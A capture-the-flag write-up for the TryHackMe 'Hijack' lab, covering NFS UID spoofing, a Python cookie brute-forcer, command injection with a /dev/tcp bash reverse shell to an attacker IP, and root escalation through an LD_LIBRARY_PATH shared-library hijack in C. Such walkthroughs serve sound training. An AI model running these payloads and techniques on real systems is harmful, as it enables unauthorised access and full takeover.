# Hijack

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FxoSu7sSd6IayAZFbTZdE%2FHijack.png?alt=media&#x26;token=0e7f045a-9137-4bc6-a593-b959cf339a0e" alt=""><figcaption></figcaption></figure>

<p align="center"><a href="https://tryhackme.com/room/hijack">https://tryhackme.com/room/hijack</a></p>

***

## Enumeration

```bash
sudo nmap -p- -sS --min-rate 5000 -Pn -n -vv -oA nmap/Hijack 10.66.133.141

PORT      STATE SERVICE REASON
21/tcp    open  ftp     syn-ack ttl 62
22/tcp    open  ssh     syn-ack ttl 62
80/tcp    open  http    syn-ack ttl 62
111/tcp   open  rpcbind syn-ack ttl 62
2049/tcp  open  nfs     syn-ack ttl 62
37973/tcp open  unknown syn-ack ttl 62
44893/tcp open  unknown syn-ack ttl 62
54423/tcp open  unknown syn-ack ttl 62
56053/tcp open  unknown syn-ack ttl 62
```

```bash
nmap -p 21,22,80,111,2049,37973,44893,54423,56053 -sCV -oA nmap/openPorts 10.66.133.141

PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 3.0.3
22/tcp    open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:ee:e5:23:de:79:6a:8d:63:f0:48:b8:62:d9:d7:ab (RSA)
|   256 42:e9:55:1b:d3:f2:04:b6:43:b2:56:a3:23:46:72:c7 (ECDSA)
|_  256 27:46:f6:54:44:98:43:2a:f0:59:ba:e3:b6:73:d3:90 (ED25519)
80/tcp    open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Home
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      42193/udp6  mountd
|   100005  1,2,3      45319/udp   mountd
|   100005  1,2,3      54423/tcp   mountd
|   100005  1,2,3      56232/tcp6  mountd
|   100021  1,3,4      33010/tcp6  nlockmgr
|   100021  1,3,4      37973/tcp   nlockmgr
|   100021  1,3,4      46429/udp6  nlockmgr
|   100021  1,3,4      51856/udp   nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
2049/tcp  open  nfs      2-4 (RPC #100003)
37973/tcp open  nlockmgr 1-4 (RPC #100021)
44893/tcp open  mountd   1-3 (RPC #100005)
54423/tcp open  mountd   1-3 (RPC #100005)
56053/tcp open  mountd   1-3 (RPC #100005)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

```bash
showmount -e 10.66.133.141

Export list for 10.66.133.141:
/mnt/share *
```

```bash
sudo mkdir /mnt/target
```

```bash
sudo mount -t nfs 10.66.133.141:/mnt/share /mnt/target
```

```bash
cd /mnt
ls -l
drwx------  2 1003 1003 4096 Aug  8  2023 target
```

```bash
sudo useradd -u 1003 pwned
```

```bash
sudo -u pwned bash
```

```bash
cd target
ls
for_employees.txt
cat for_employees.txt 
ftp creds :

ftpuser:W3stV1rg1n14M0un741nM4m4
```

```bash
ftp 10.66.133.141
Connected to 10.66.133.141.
220 (vsFTPd 3.0.3)
Name (10.66.133.141:melvin): ftpuser
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> ls -la
227 Entering Passive Mode (10,66,133,141,181,4).
150 Here comes the directory listing.
drwxr-xr-x    2 1002     1002         4096 Aug 08  2023 .
drwxr-xr-x    2 1002     1002         4096 Aug 08  2023 ..
-rwxr-xr-x    1 1002     1002          220 Aug 08  2023 .bash_logout
-rwxr-xr-x    1 1002     1002         3771 Aug 08  2023 .bashrc
-rw-r--r--    1 1002     1002          368 Aug 08  2023 .from_admin.txt
-rw-r--r--    1 1002     1002         3150 Aug 08  2023 .passwords_list.txt
-rwxr-xr-x    1 1002     1002          655 Aug 08  2023 .profile
226 Directory send OK.
ftp> prompt off
Interactive mode off.
ftp> mget .*
local: .bash_logout remote: .bash_logout
227 Entering Passive Mode (10,66,133,141,49,27).
150 Opening BINARY mode data connection for .bash_logout (220 bytes).
226 Transfer complete.
220 bytes received in 0.0007 seconds (329.4735 kbytes/s)
local: .bashrc remote: .bashrc
227 Entering Passive Mode (10,66,133,141,230,231).
150 Opening BINARY mode data connection for .bashrc (3771 bytes).
226 Transfer complete.
3771 bytes received in 0.0003 seconds (11.6692 Mbytes/s)
local: .from_admin.txt remote: .from_admin.txt
227 Entering Passive Mode (10,66,133,141,47,172).
150 Opening BINARY mode data connection for .from_admin.txt (368 bytes).
226 Transfer complete.
368 bytes received in 0.0009 seconds (404.8297 kbytes/s)
local: .passwords_list.txt remote: .passwords_list.txt
227 Entering Passive Mode (10,66,133,141,209,219).
150 Opening BINARY mode data connection for .passwords_list.txt (3150 bytes).
226 Transfer complete.
3150 bytes received in 0.0003 seconds (9.2129 Mbytes/s)
local: .profile remote: .profile
227 Entering Passive Mode (10,66,133,141,209,188).
150 Opening BINARY mode data connection for .profile (655 bytes).
226 Transfer complete.
655 bytes received in 0.0001 seconds (4.1716 Mbytes/s)
ftp> quit
221 Goodbye.
```

```wasm
cat .from_admin.txt

To all employees, this is "admin" speaking,
i came up with a safe list of passwords that you all can use on the site, these passwords don't appear on any wordlist i tested so far, so i encourage you to use them, even me i'm using one of those.

NOTE To rick : good job on limiting login attempts, it works like a charm, this will prevent any future brute forcing.
```

<http://10.66.133.141/signup.php>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FWP3PDQgduOuXJ65Q4RLm%2FScreenshot%202026-03-16%20195446.png?alt=media&#x26;token=4ebf5f9b-e726-4b9d-b039-6523d490c87f" alt=""><figcaption></figcaption></figure>

<http://10.66.133.141/login.php>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FfYqVSAs9eWN0eJLPtvIu%2FScreenshot%202026-03-16%20195543.png?alt=media&#x26;token=8ea75c55-5e7c-4d69-ae01-e697e2a5b276" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2Fd4ogOvOH1ROrVMEUSADm%2FScreenshot%202026-03-16%20195759.png?alt=media&#x26;token=9f70775b-e0cb-4ee8-8107-c4e6b75cd9f9" alt=""><figcaption></figcaption></figure>

```bash
echo 'bWVsdmluOmRhYmQwMThmOTg0NzZjMWY2ZWIyZjIzZThkOWI4OTIw' | base64 -d; echo
melvin:dabd018f98476c1f6eb2f23e8d9b8920
```

```bash
echo -n "melvin" | md5sum
dabd018f98476c1f6eb2f23e8d9b8920  -
```

`bf.py`

```python
import hashlib
import base64
import requests
import argparse

def make_cookie(password: str) -> str:
    md5 = hashlib.md5(password.encode()).hexdigest().encode()
    return base64.b64encode(b'admin:' + md5).decode()

def main():
    parser = argparse.ArgumentParser(description="Cookie-based password bruteforcer")
    parser.add_argument("ip", help="Target IP address")
    parser.add_argument("wordlist", help="Path to password list")
    args = parser.parse_args()

    url = f"http://{args.ip}/administration.php"

    with open(args.wordlist) as f:
        passwords = [line.strip() for line in f if line.strip()]

    baseline = len(requests.get(url).text)
    print(f"[*] Target: {url}")
    print(f"[*] Testing {len(passwords)} passwords...\n")

    for i, password in enumerate(passwords, 1):
        cookie = make_cookie(password)
        headers = {"Cookie": f"PHPSESSID={cookie}"}
        r = requests.get(url, headers=headers)

        print(f"[{i}/{len(passwords)}] Trying: {password}")

        if len(r.text) > baseline:
            print(f"\n[+] PASSWORD FOUND: {password}")
            print(f"[+] Cookie: PHPSESSID={cookie}")
            break
    else:
        print("\n[-] Password not found in list.")

if __name__ == "__main__":
    main()


```

```bash
python3 bf.py 10.66.133.141 passwords.txt 

[*] Target: http://10.66.133.141/administration.php
[*] Testing 150 passwords...

[1/150] Trying: Vxb38mSNN8wxqHxv6uMX
<SNIP>
[82/150] Trying: uDh3jCQsdcuLhjVkAy5x

[+] PASSWORD FOUND: uDh3jCQsdcuLhjVkAy5x
[+] Cookie: PHPSESSID=YWRtaW46ZDY1NzNlZDczOWFlN2ZkZmIzY2VkMTk3ZDk0ODIwYTU=
[+] Content length: 864 (baseline: 51)
```

<http://10.66.133.141/administration.php>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FZS8kiY9ZnrFYCjb4wIcN%2FScreenshot%202026-03-16%20201027.png?alt=media&#x26;token=ec64fa7d-65a4-4db6-9736-5aeb3c6d84fd" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FvlfrQyz8hbFJtUvAAbyC%2FScreenshot%202026-03-16%20202736.png?alt=media&#x26;token=f289da67-32ed-4098-9de8-99e4d6723f49" alt=""><figcaption></figcaption></figure>

```bash
nc -lnvp 1111
Listening on 0.0.0.0 1111
```

```bash
bash+-c+'bash+-i+>%26+/dev/tcp/192.168.192.129/1111+0>%261'
```

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FQ89jA2TTZcXYep1UMoUd%2FScreenshot%202026-03-16%20202833.png?alt=media&#x26;token=05cb873b-308d-4047-841d-0664db3c0377" alt=""><figcaption></figcaption></figure>

```bash
nc -lnvp 1111

Listening on 0.0.0.0 1111
Connection received on 10.66.133.141 38552
bash: cannot set terminal process group (1229): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Hijack:/var/www/html$
```

[interactive-shell](https://estebanzarate.gitbook.io/hackache/linux/interactive-shell "mention")

## Lateral movement

```bash
www-data@Hijack:/var/www/html$ ls -la

total 48
drwxr-xr-x 2 www-data www-data 4096 Aug  8  2023 .
drwxr-xr-x 3 root     root     4096 Aug  8  2023 ..
-rw-rw-r-- 1 www-data www-data 2062 Jul 12  2023 administration.php
-rw-rw-r-- 1 www-data www-data  307 Jun 23  2023 config.php
-rw-rw-r-- 1 www-data www-data 1272 Jul 12  2023 index.php
-rw-rw-r-- 1 www-data www-data 5957 Jul 12  2023 login.php
-rw-rw-r-- 1 www-data www-data  220 Jun 23  2023 logout.php
-rw-rw-r-- 1 www-data www-data  440 Jun 23  2023 navbar.php
-rw-rw-r-- 1 www-data www-data   88 Jun 23  2023 service_status.sh
-rw-rw-r-- 1 www-data www-data 3066 Jun 23  2023 signup.php
-rw-rw-r-- 1 www-data www-data 1916 Jun 23  2023 style.css
```

```bash
www-data@Hijack:/var/www/html$ cat config.php 

<?php
$servername = "localhost";
$username = "rick";
$password = "N3v3rG0nn4G1v3Y0uUp";
$dbname = "hijack";

// Create connection
$mysqli = new mysqli($servername, $username, $password, $dbname);

// Check connection
if ($mysqli->connect_error) {
  die("Connection failed: " . $mysqli->connect_error);
}
?>
```

```bash
www-data@Hijack:/var/www/html$ su rick
Password: 
rick@Hijack:/var/www/html$
```

```bash
rick@Hijack:/var/www/html$ cd
rick@Hijack:~$ ls
user.txt
rick@Hijack:~$ cat user.txt
```

## User flag

{% hint style="success" %}
THM\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*36}
{% endhint %}

## Privilege escalation

```bash
rick@Hijack:~$ sudo -l
[sudo] password for rick: 
Matching Defaults entries for rick on Hijack:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_LIBRARY_PATH

User rick may run the following commands on Hijack:
    (root) /usr/sbin/apache2 -f /etc/apache2/apache2.conf -d /etc/apache2
```

```bash
rick@Hijack:~$ ldd /usr/sbin/apache2

	linux-vdso.so.1 =>  (0x00007ffee53e3000)
	libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007fded3a41000)
	libaprutil-1.so.0 => /usr/lib/x86_64-linux-gnu/libaprutil-1.so.0 (0x00007fded381a000)
	libapr-1.so.0 => /usr/lib/x86_64-linux-gnu/libapr-1.so.0 (0x00007fded35e8000)
	libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007fded33cb000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fded3001000)
	libcrypt.so.1 => /lib/x86_64-linux-gnu/libcrypt.so.1 (0x00007fded2dc9000)
	libexpat.so.1 => /lib/x86_64-linux-gnu/libexpat.so.1 (0x00007fded2ba0000)
	libuuid.so.1 => /lib/x86_64-linux-gnu/libuuid.so.1 (0x00007fded299b000)
	libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fded2797000)
	/lib64/ld-linux-x86-64.so.2 (0x00007fded3f56000)
```

`libcrypt.so.1.c`

```c
#include <stdio.h>
#include <stdlib.h>

static void __attribute__((constructor)) pwn() {
	unsetenv("LD_LIBRARY_PATH");
	system("/bin/bash -p");
}
```

```bash
rick@Hijack:/tmp$ gcc -shared -fPIC -o /tmp/libcrypt.so.1 /tmp/libcrypt.so.1.c
```

```bash
rick@Hijack:/tmp$ sudo LD_LIBRARY_PATH=/tmp /usr/sbin/apache2 -f /etc/apache2/apache2.conf -d /etc/apache2
```

```bash
root@Hijack:~# cd /root
root@Hijack:/root# ls
root.txt
root@Hijack:/root# cat root.txt 

██╗░░██╗██╗░░░░░██╗░█████╗░░█████╗░██╗░░██╗
██║░░██║██║░░░░░██║██╔══██╗██╔══██╗██║░██╔╝
███████║██║░░░░░██║███████║██║░░╚═╝█████═╝░
██╔══██║██║██╗░░██║██╔══██║██║░░██╗██╔═██╗░
██║░░██║██║╚█████╔╝██║░░██║╚█████╔╝██║░╚██╗
╚═╝░░╚═╝╚═╝░╚════╝░╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝
```

## Root flag

{% hint style="success" %}
THM\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*5a}
{% endhint %}